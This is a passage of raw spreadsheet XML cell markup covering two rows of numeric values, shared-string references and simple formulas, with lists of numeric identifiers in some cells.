        <v>792.0</v>
      </c>
      <c r="AR133" s="100" t="s">
        <v>2254</v>
      </c>
      <c r="AS133" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AT133" s="100" t="str">
        <f t="shared" si="227"/>
        <v>1411, 1417</v>
      </c>
      <c r="AU133" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AV133" s="100" t="s">
        <v>2254</v>
      </c>
      <c r="AW133" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AX133" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AY133" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ133" s="100">
        <v>0.0</v>
      </c>
      <c r="BA133" s="102">
        <v>1.0</v>
      </c>
      <c r="BB133" s="102">
        <v>1.0</v>
      </c>
      <c r="BC133" s="102">
        <v>396.0</v>
      </c>
      <c r="BD133" s="102">
        <v>792.0</v>
      </c>
      <c r="BE133" s="102">
        <v>0.0</v>
      </c>
      <c r="BF133" s="102">
        <v>0.0</v>
      </c>
      <c r="BG133" s="102">
        <v>0.0</v>
      </c>
      <c r="BH133" s="102">
        <v>0.0</v>
      </c>
      <c r="BI133" s="102">
        <v>1.0</v>
      </c>
      <c r="BJ133" s="102">
        <v>396.0</v>
      </c>
      <c r="BK133" s="102">
        <v>792.0</v>
      </c>
      <c r="BL133" s="103">
        <f t="shared" si="167"/>
        <v>1</v>
      </c>
      <c r="BM133" s="103">
        <f t="shared" si="168"/>
        <v>1</v>
      </c>
      <c r="BN133" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO133" s="103">
        <f t="shared" si="170"/>
        <v>396</v>
      </c>
      <c r="BP133" s="103">
        <f t="shared" si="171"/>
        <v>396</v>
      </c>
      <c r="BQ133" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR133" s="103">
        <f t="shared" si="173"/>
        <v>792</v>
      </c>
      <c r="BS133" s="103">
        <f t="shared" si="174"/>
        <v>792</v>
      </c>
      <c r="BT133" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU133" s="103">
        <f t="shared" si="217"/>
        <v>0</v>
      </c>
      <c r="BV133" s="103">
        <f t="shared" si="218"/>
        <v>0</v>
      </c>
      <c r="BW133" s="104" t="s">
        <v>2255</v>
      </c>
      <c r="BX133" s="104">
        <v>3.0</v>
      </c>
      <c r="BY133" s="104">
        <v>1188.0</v>
      </c>
      <c r="BZ133" s="101">
        <v>2101411.0</v>
      </c>
      <c r="CA133" s="171" t="s">
        <v>2254</v>
      </c>
      <c r="CB133" s="171">
        <v>2.0</v>
      </c>
      <c r="CC133" s="171">
        <v>792.0</v>
      </c>
      <c r="CD133" s="104" t="s">
        <v>2255</v>
      </c>
      <c r="CE133" s="171">
        <v>2101411.0</v>
      </c>
      <c r="CF133" s="104" t="str">
        <f t="shared" si="215"/>
        <v>2101411, 1411, 1417</v>
      </c>
      <c r="CG133" s="171" t="s">
        <v>12</v>
      </c>
      <c r="CH133" s="104" t="s">
        <v>2255</v>
      </c>
      <c r="CI133" s="171" t="s">
        <v>12</v>
      </c>
      <c r="CJ133" s="172" t="s">
        <v>12</v>
      </c>
      <c r="CK133" s="104">
        <v>0.0</v>
      </c>
      <c r="CL133" s="104">
        <v>0.0</v>
      </c>
      <c r="CM133" s="105">
        <v>1.0</v>
      </c>
      <c r="CN133" s="105">
        <v>1.0</v>
      </c>
      <c r="CO133" s="105">
        <v>396.0</v>
      </c>
      <c r="CP133" s="105">
        <v>792.0</v>
      </c>
      <c r="CQ133" s="105">
        <v>396.0</v>
      </c>
      <c r="CR133" s="105">
        <v>792.0</v>
      </c>
      <c r="CS133" s="105">
        <v>0.0</v>
      </c>
      <c r="CT133" s="105">
        <v>0.0</v>
      </c>
      <c r="CU133" s="105">
        <v>0.0</v>
      </c>
      <c r="CV133" s="105">
        <v>0.0</v>
      </c>
      <c r="CW133" s="105">
        <v>1.0</v>
      </c>
      <c r="CX133" s="105">
        <v>396.0</v>
      </c>
      <c r="CY133" s="105">
        <v>792.0</v>
      </c>
      <c r="CZ133" s="105">
        <v>0.0</v>
      </c>
      <c r="DA133" s="105">
        <v>792.0</v>
      </c>
      <c r="DB133" s="106">
        <f t="shared" si="176"/>
        <v>1</v>
      </c>
      <c r="DC133" s="106">
        <f t="shared" si="177"/>
        <v>1</v>
      </c>
      <c r="DD133" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE133" s="106">
        <f t="shared" si="179"/>
        <v>396</v>
      </c>
      <c r="DF133" s="106">
        <f t="shared" si="180"/>
        <v>396</v>
      </c>
      <c r="DG133" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH133" s="106">
        <f t="shared" si="181"/>
        <v>792</v>
      </c>
      <c r="DI133" s="106">
        <f t="shared" si="182"/>
        <v>792</v>
      </c>
      <c r="DJ133" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK133" s="107">
        <f t="shared" si="219"/>
        <v>0</v>
      </c>
      <c r="DL133" s="106">
        <f t="shared" si="220"/>
        <v>0</v>
      </c>
      <c r="DM133" s="108" t="s">
        <v>2255</v>
      </c>
      <c r="DN133" s="108">
        <v>3.0</v>
      </c>
      <c r="DO133" s="108">
        <v>1188.0</v>
      </c>
      <c r="DP133" s="101">
        <v>2101411.0</v>
      </c>
      <c r="DQ133" s="108" t="s">
        <v>2254</v>
      </c>
      <c r="DR133" s="108">
        <v>2.0</v>
      </c>
      <c r="DS133" s="108">
        <v>792.0</v>
      </c>
      <c r="DT133" s="108" t="s">
        <v>2255</v>
      </c>
      <c r="DU133" s="108">
        <v>2101411.0</v>
      </c>
      <c r="DV133" s="108" t="str">
        <f t="shared" si="221"/>
        <v>2101411, 1411, 1417</v>
      </c>
      <c r="DW133" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX133" s="108" t="s">
        <v>2255</v>
      </c>
      <c r="DY133" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ133" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA133" s="108">
        <v>0.0</v>
      </c>
      <c r="EB133" s="108">
        <v>0.0</v>
      </c>
      <c r="EC133" s="109">
        <v>1.0</v>
      </c>
      <c r="ED133" s="109">
        <v>1.0</v>
      </c>
      <c r="EE133" s="109">
        <v>396.0</v>
      </c>
      <c r="EF133" s="109">
        <v>792.0</v>
      </c>
      <c r="EG133" s="109">
        <v>396.0</v>
      </c>
      <c r="EH133" s="109">
        <v>792.0</v>
      </c>
      <c r="EI133" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ133" s="109">
        <v>0.0</v>
      </c>
      <c r="EK133" s="109">
        <v>0.0</v>
      </c>
      <c r="EL133" s="109">
        <v>0.0</v>
      </c>
      <c r="EM133" s="109">
        <v>1.0</v>
      </c>
      <c r="EN133" s="109">
        <v>396.0</v>
      </c>
      <c r="EO133" s="109">
        <v>792.0</v>
      </c>
      <c r="EP133" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ133" s="109">
        <v>792.0</v>
      </c>
      <c r="ER133" s="110">
        <f t="shared" si="184"/>
        <v>1</v>
      </c>
      <c r="ES133" s="110">
        <f t="shared" si="185"/>
        <v>1</v>
      </c>
      <c r="ET133" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU133" s="110">
        <f t="shared" si="187"/>
        <v>396</v>
      </c>
      <c r="EV133" s="110">
        <f t="shared" si="188"/>
        <v>396</v>
      </c>
      <c r="EW133" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX133" s="110">
        <f t="shared" si="190"/>
        <v>792</v>
      </c>
      <c r="EY133" s="110">
        <f t="shared" si="191"/>
        <v>792</v>
      </c>
      <c r="EZ133" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA133" s="110">
        <f t="shared" si="222"/>
        <v>0</v>
      </c>
      <c r="FB133" s="110">
        <f t="shared" si="223"/>
        <v>0</v>
      </c>
      <c r="FC133" s="111" t="s">
        <v>2256</v>
      </c>
      <c r="FD133" s="111">
        <v>6.0</v>
      </c>
      <c r="FE133" s="111">
        <v>1188.0</v>
      </c>
      <c r="FF133" s="101" t="s">
        <v>2257</v>
      </c>
      <c r="FG133" s="111" t="s">
        <v>2254</v>
      </c>
      <c r="FH133" s="111">
        <v>2.0</v>
      </c>
      <c r="FI133" s="111">
        <v>792.0</v>
      </c>
      <c r="FJ133" s="111" t="s">
        <v>2258</v>
      </c>
      <c r="FK133" s="111" t="s">
        <v>2257</v>
      </c>
      <c r="FL133" s="111" t="str">
        <f t="shared" si="216"/>
        <v>2101411, 2101417, 2002752, 2002749, 1411, 1417</v>
      </c>
      <c r="FM133" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN133" s="111" t="str">
        <f>IF(FL133="-",FM133,FL133)</f>
        <v>2101411, 2101417, 2002752, 2002749, 1411, 1417</v>
      </c>
      <c r="FO133" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP133" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ133" s="111">
        <v>0.0</v>
      </c>
      <c r="FR133" s="111">
        <v>0.0</v>
      </c>
      <c r="FS133" s="112">
        <v>1.0</v>
      </c>
      <c r="FT133" s="112">
        <v>1.0</v>
      </c>
      <c r="FU133" s="112">
        <v>397.0</v>
      </c>
      <c r="FV133" s="112">
        <v>792.0</v>
      </c>
      <c r="FW133" s="112">
        <v>796.0</v>
      </c>
      <c r="FX133" s="112">
        <v>796.0</v>
      </c>
      <c r="FY133" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ133" s="112">
        <v>0.0</v>
      </c>
      <c r="GA133" s="112">
        <v>0.0</v>
      </c>
      <c r="GB133" s="112">
        <v>0.0</v>
      </c>
      <c r="GC133" s="112">
        <v>1.0</v>
      </c>
      <c r="GD133" s="112">
        <v>396.0</v>
      </c>
      <c r="GE133" s="112">
        <v>792.0</v>
      </c>
      <c r="GF133" s="112">
        <v>0.0</v>
      </c>
      <c r="GG133" s="112">
        <v>792.0</v>
      </c>
      <c r="GH133" s="113">
        <f t="shared" si="193"/>
        <v>1</v>
      </c>
      <c r="GI133" s="113">
        <f t="shared" si="194"/>
        <v>1</v>
      </c>
      <c r="GJ133" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK133" s="113">
        <f t="shared" si="196"/>
        <v>397</v>
      </c>
      <c r="GL133" s="113">
        <f t="shared" si="197"/>
        <v>396</v>
      </c>
      <c r="GM133" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN133" s="113">
        <f t="shared" si="199"/>
        <v>796</v>
      </c>
      <c r="GO133" s="113">
        <f t="shared" si="200"/>
        <v>792</v>
      </c>
      <c r="GP133" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ133" s="114">
        <f t="shared" si="224"/>
        <v>0</v>
      </c>
      <c r="GR133" s="113">
        <f t="shared" si="225"/>
        <v>0</v>
      </c>
      <c r="GS133" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT133" s="94"/>
      <c r="GU133" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV133" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW133" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF133" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG133" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH133" s="116" t="s">
        <v>2259</v>
      </c>
      <c r="HI133" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ133" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK133" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL133" s="93">
        <v>1.0</v>
      </c>
      <c r="HM133" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN133" s="93">
        <v>0.0</v>
      </c>
      <c r="HO133" s="93">
        <v>1.0</v>
      </c>
      <c r="HP133" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ133" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR133" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS133" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT133" s="139" t="s">
        <v>2260</v>
      </c>
      <c r="HU133" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV133" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW133" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX133" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC133" s="120" t="str">
        <f t="shared" si="226"/>
        <v>-</v>
      </c>
      <c r="ID133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH133" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II133" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ133" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK133" s="99">
        <v>1.0</v>
      </c>
      <c r="IL133" s="99">
        <v>0.0</v>
      </c>
      <c r="IM133" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN133" s="122" t="s">
        <v>444</v>
      </c>
      <c r="IO133" s="98">
        <v>1.0</v>
      </c>
      <c r="IP133" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ133" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR133" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS133" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT133" s="127"/>
      <c r="IU133" s="127"/>
      <c r="IV133" s="127"/>
      <c r="IW133" s="127"/>
      <c r="IX133" s="127"/>
      <c r="IY133" s="127"/>
      <c r="IZ133" s="127"/>
      <c r="JA133" s="127"/>
      <c r="JB133" s="127"/>
      <c r="JC133" s="127"/>
      <c r="JD133" s="127"/>
      <c r="JE133" s="127"/>
      <c r="JF133" s="127"/>
      <c r="JG133" s="127"/>
      <c r="JH133" s="127"/>
      <c r="JI133" s="127"/>
      <c r="JJ133" s="127"/>
      <c r="JK133" s="127"/>
      <c r="JL133" s="127"/>
      <c r="JM133" s="127"/>
      <c r="JN133" s="127"/>
      <c r="JO133" s="127"/>
      <c r="JP133" s="127"/>
      <c r="JQ133" s="127"/>
      <c r="JR133" s="127"/>
      <c r="JS133" s="127"/>
      <c r="JT133" s="127"/>
      <c r="JU133" s="127"/>
      <c r="JV133" s="127"/>
      <c r="JW133" s="127"/>
      <c r="JX133" s="127"/>
      <c r="JY133" s="127"/>
      <c r="JZ133" s="127"/>
      <c r="KA133" s="127"/>
      <c r="KB133" s="127"/>
      <c r="KC133" s="127"/>
      <c r="KD133" s="127"/>
      <c r="KE133" s="127"/>
      <c r="KF133" s="127"/>
      <c r="KG133" s="127"/>
      <c r="KH133" s="127"/>
      <c r="KI133" s="127"/>
      <c r="KJ133" s="127"/>
      <c r="KK133" s="127"/>
      <c r="KL133" s="127"/>
      <c r="KM133" s="127"/>
      <c r="KN133" s="127"/>
      <c r="KO133" s="127"/>
      <c r="KP133" s="127"/>
      <c r="KQ133" s="127"/>
      <c r="KR133" s="127"/>
      <c r="KS133" s="127"/>
      <c r="KT133" s="127"/>
      <c r="KU133" s="127"/>
      <c r="KV133" s="127"/>
      <c r="KW133" s="127"/>
      <c r="KX133" s="127"/>
      <c r="KY133" s="127"/>
      <c r="KZ133" s="127"/>
      <c r="LA133" s="127"/>
      <c r="LB133" s="127"/>
      <c r="LC133" s="127"/>
      <c r="LD133" s="127"/>
      <c r="LE133" s="127"/>
      <c r="LF133" s="127"/>
      <c r="LG133" s="127"/>
      <c r="LH133" s="127"/>
      <c r="LI133" s="127"/>
      <c r="LJ133" s="127"/>
      <c r="LK133" s="127"/>
      <c r="LL133" s="127"/>
      <c r="LM133" s="127"/>
      <c r="LN133" s="127"/>
      <c r="LO133" s="127"/>
      <c r="LP133" s="127"/>
      <c r="LQ133" s="127"/>
      <c r="LR133" s="127"/>
      <c r="LS133" s="127"/>
      <c r="LT133" s="127"/>
      <c r="LU133" s="127"/>
      <c r="LV133" s="127"/>
      <c r="LW133" s="127"/>
      <c r="LX133" s="127"/>
      <c r="LY133" s="127"/>
      <c r="LZ133" s="127"/>
      <c r="MA133" s="127"/>
      <c r="MB133" s="127"/>
      <c r="MC133" s="127"/>
      <c r="MD133" s="127"/>
      <c r="ME133" s="127"/>
      <c r="MF133" s="127"/>
      <c r="MG133" s="127"/>
      <c r="MH133" s="127"/>
      <c r="MI133" s="127"/>
      <c r="MJ133" s="127"/>
      <c r="MK133" s="127"/>
      <c r="ML133" s="127"/>
      <c r="MM133" s="127"/>
      <c r="MN133" s="127"/>
      <c r="MO133" s="127"/>
      <c r="MP133" s="127"/>
      <c r="MQ133" s="127"/>
      <c r="MR133" s="127"/>
      <c r="MS133" s="127"/>
      <c r="MT133" s="127"/>
      <c r="MU133" s="127"/>
      <c r="MV133" s="127"/>
      <c r="MW133" s="127"/>
      <c r="MX133" s="127"/>
      <c r="MY133" s="127"/>
      <c r="MZ133" s="127"/>
      <c r="NA133" s="127"/>
      <c r="NB133" s="127"/>
      <c r="NC133" s="127"/>
      <c r="ND133" s="127"/>
      <c r="NE133" s="127"/>
      <c r="NF133" s="127"/>
      <c r="NG133" s="127"/>
      <c r="NH133" s="127"/>
      <c r="NI133" s="127"/>
      <c r="NJ133" s="127"/>
      <c r="NK133" s="127"/>
      <c r="NL133" s="127"/>
      <c r="NM133" s="127"/>
      <c r="NN133" s="127"/>
      <c r="NO133" s="127"/>
      <c r="NP133" s="127"/>
      <c r="NQ133" s="127"/>
      <c r="NR133" s="127"/>
      <c r="NS133" s="127"/>
      <c r="NT133" s="127"/>
      <c r="NU133" s="127"/>
      <c r="NV133" s="127"/>
      <c r="NW133" s="127"/>
      <c r="NX133" s="127"/>
      <c r="NY133" s="127"/>
    </row>
    <row r="134" ht="153.75" customHeight="1">
      <c r="B134" s="89" t="s">
        <v>664</v>
      </c>
      <c r="C134" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D134" s="90" t="s">
        <v>665</v>
      </c>
      <c r="E134" s="90" t="s">
        <v>2261</v>
      </c>
      <c r="F134" s="90" t="s">
        <v>2262</v>
      </c>
      <c r="G134" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H134" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I134" s="92" t="s">
        <v>2263</v>
      </c>
      <c r="J134" s="92" t="s">
        <v>2264</v>
      </c>
      <c r="K134" s="92" t="s">
        <v>2265</v>
      </c>
      <c r="L134" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M134" s="93">
        <v>69.0</v>
      </c>
      <c r="N134" s="93">
        <v>1.0</v>
      </c>
      <c r="O134" s="93">
        <v>0.0</v>
      </c>
      <c r="P134" s="93">
        <v>1.0</v>
      </c>
      <c r="Q134" s="93">
        <f t="shared" si="204"/>
        <v>1</v>
      </c>
      <c r="R134" s="93">
        <v>1.0</v>
      </c>
      <c r="S134" s="93">
        <v>0.0</v>
      </c>
      <c r="T134" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U134" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V134" s="96" t="s">
        <v>2266</v>
      </c>
      <c r="W134" s="96" t="s">
        <v>2267</v>
      </c>
      <c r="X134" s="126" t="s">
        <v>2268</v>
      </c>
      <c r="Y134" s="126" t="s">
        <v>2269</v>
      </c>
      <c r="Z134" s="132" t="s">
        <v>2270</v>
      </c>
      <c r="AA134" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB134" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC134" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD134" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE134" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF134" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG134" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH134" s="99" t="s">
        <v>2271</v>
      </c>
      <c r="AI134" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ134" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK134" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL134" s="100">
        <v>0.0</v>
      </c>
      <c r="AM134" s="100">
        <v>0.0</v>
      </c>
      <c r="AN134" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO134" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP134" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ134" s="100">
        <v>0.0</v>
      </c>
      <c r="AR134" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS134" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT134" s="100" t="str">
        <f t="shared" si="227"/>
        <v>-</v>
      </c>
      <c r="AU134" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV134" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW134" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX134" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY134" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ134" s="100">
        <v>0.0</v>
      </c>
      <c r="BA134" s="102">
        <v>69.0</v>
      </c>
      <c r="BB134" s="102">
        <v>0.0</v>
      </c>
      <c r="BC134" s="102">
        <v>0.0</v>
      </c>
      <c r="BD134" s="102">
        <v>0.0</v>
      </c>
      <c r="BE134" s="102">
        <v>0.0</v>
      </c>
      <c r="BF134" s="102">
        <v>0.0</v>
      </c>
      <c r="BG134" s="102">
        <v>0.0</v>
      </c>
      <c r="BH134" s="102">
        <v>0.0</v>
      </c>
      <c r="BI134" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ134" s="102">
        <v>0.0</v>
      </c>
      <c r="BK134" s="102">
        <v>0.0</v>
      </c>
      <c r="BL134" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM134" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN134" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO134" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP134" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ134" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR134" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS134" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT134" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU134" s="103">
        <f t="shared" si="217"/>
        <v>0</v>
      </c>
      <c r="BV134" s="103">
        <f t="shared" si="218"/>
        <v>0</v>
      </c>
      <c r="BW134" s="104" t="s">
        <v>2272</v>
      </c>
      <c r="BX134" s="104">
        <v>2.0</v>
      </c>
      <c r="BY134" s="104">
        <v>2.0</v>
      </c>
      <c r="BZ134" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA134" s="104" t="s">
        <v>2272</v>
      </c>
      <c r="CB134" s="104">
        <v>2.0</v>
      </c>
      <c r="CC134" s="104">
        <v>2.0</v>
      </c>
      <c r="CD134" s="104" t="s">
        <v>2272</v>
      </c>
      <c r="CE134" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF134" s="104" t="str">
        <f t="shared" si="215"/>
        <v>2044770, 2019240</v>
      </c>
      <c r="CG134" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH134" s="104" t="s">
        <v>2272</v>
      </c>
      <c r="CI134" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ134" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK134" s="104">
        <v>0.0</v>
      </c>
      <c r="CL134" s="104">
        <v>0.0</v>
      </c>
      <c r="CM134" s="105">
        <v>69.0</v>
      </c>
      <c r="CN134" s="105">
        <v>2.0</v>
      </c>
      <c r="CO134" s="105">
        <v>2.0</v>
      </c>
      <c r="CP134" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ134" s="105">
        <v>2.0</v>
      </c>
      <c r="CR134" s="105">
        <v>2.0</v>
      </c>
      <c r="CS134" s="105">
        <v>0.0</v>
      </c>
      <c r="CT134" s="105">
        <v>0.0</v>
      </c>
      <c r="CU134" s="105">
        <v>0.0</v>
      </c>
      <c r="CV134" s="105">
        <v>0.0</v>
      </c>
      <c r="CW134" s="105">
        <v>2.0</v>
      </c>
      <c r="CX134" s="105">
        <v>2.0</v>
      </c>
      <c r="CY134" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ134" s="105">
        <v>2.0</v>
      </c>
      <c r="DA134" s="105">
        <v>2.0</v>
      </c>
      <c r="DB134" s="106">
        <f t="shared" si="176"/>
        <v>2</v>
      </c>
      <c r="DC134" s="106">
        <f t="shared" si="177"/>
        <v>2</v>
      </c>
      <c r="DD134" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE134" s="106">
        <f t="shared" si="179"/>
        <v>2</v>
      </c>
      <c r="DF134" s="106">
        <f t="shared" si="180"/>
        <v>2</v>
      </c>
      <c r="DG134" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH134" s="106">
        <f t="shared" si="181"/>
        <v>2</v>
      </c>
      <c r="DI134" s="106">
        <f t="shared" si="182"/>
        <v>2</v>
      </c>
      <c r="DJ134" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK134" s="107">
        <f t="shared" si="219"/>
        <v>0</v>
      </c>
      <c r="DL134" s="106">
        <f t="shared" si="220"/>
        <v>0</v>
      </c>
      <c r="DM134" s="108" t="s">
        <v>2273</v>
      </c>
      <c r="DN134" s="108">
        <v>4.0</v>
      </c>
      <c r="DO134" s="108">
        <v>9.0</v>
      </c>
      <c r="DP134" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ134" s="108" t="s">
        <v>2273</v>
      </c>
      <c r="DR134" s="108">
        <v>4.0</v>
      </c>
      <c r="DS134" s="108">
        <v>9.0</v>
      </c>
      <c r="DT134" s="108" t="s">
        <v>2273</v>
      </c>
      <c r="DU134" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV134" s="108" t="str">
        <f t="shared" si="221"/>
        <v>2044770, 2019240, 15259, 50447</v>
      </c>
      <c r="DW134" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX134" s="108" t="s">
        <v>2273</v>
      </c>
      <c r="DY134" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ134" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA134" s="108">
        <v>0.0</v>
      </c>
      <c r="EB134" s="108">
        <v>0.0</v>
      </c>
      <c r="EC134" s="109">
        <v>69.0</v>
      </c>
      <c r="ED134" s="109">
        <v>10.0</v>
      </c>
      <c r="EE134" s="109">
        <v>11.0</v>
      </c>
      <c r="EF134" s="109">
        <v>9.0</v>
      </c>
      <c r="EG134" s="109">
        <v>2.0</v>
      </c>
      <c r="EH134" s="109">
        <v>11.0</v>
      </c>
      <c r="EI134" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ134" s="109">
        <v>0.0</v>
      </c>
      <c r="EK134" s="109">
        <v>0.0</v>
      </c>
      <c r="EL134" s="109">
        <v>0.0</v>
      </c>
      <c r="EM134" s="109">
        <v>10.0</v>
      </c>
      <c r="EN134" s="109">
        <v>11.0</v>
      </c>
      <c r="EO134" s="109">
        <v>9.0</v>
      </c>
      <c r="EP134" s="109">
        <v>2.0</v>
      </c>
      <c r="EQ134" s="109">
        <v>11.0</v>
      </c>
      <c r="ER134" s="110">
        <f t="shared" si="184"/>
        <v>10</v>
      </c>
      <c r="ES134" s="110">
        <f t="shared" si="185"/>
        <v>10</v>
      </c>
      <c r="ET134" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU134" s="110">
        <f t="shared" si="187"/>
        <v>11</v>
      </c>
      <c r="EV134" s="110">
        <f t="shared" si="188"/>
        <v>11</v>
      </c>
      <c r="EW134" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX134" s="110">
        <f t="shared" si="190"/>
        <v>11</v>
      </c>
      <c r="EY134" s="110">
        <f t="shared" si="191"/>
        <v>11</v>
      </c>
      <c r="EZ134" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA134" s="110">
        <f t="shared" si="222"/>
        <v>0</v>
      </c>
      <c r="FB134" s="110">
        <f t="shared" si="223"/>
        <v>0</v>
      </c>
      <c r="FC134" s="111" t="s">
        <v>2274</v>
      </c>
